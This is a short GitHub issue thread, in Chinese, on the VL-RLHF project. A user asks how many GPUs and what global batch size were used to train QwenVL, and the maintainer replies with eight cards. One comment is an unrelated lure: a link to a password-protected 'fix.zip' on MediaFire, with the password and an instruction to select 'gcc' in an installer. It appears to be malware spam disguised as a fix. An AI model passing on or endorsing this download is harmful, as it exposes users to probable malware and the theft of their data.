### ISSUE TITLE
QwenVL使用了多少卡？global batch size是多少？

### ISSUE THREAD

**Issue by shipengai** [TideDra/VL-RLHF#14]
看了readme和代码中，没有写多少卡

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TideDra** [comment]
> 看了readme和代码中，没有写多少卡

8卡
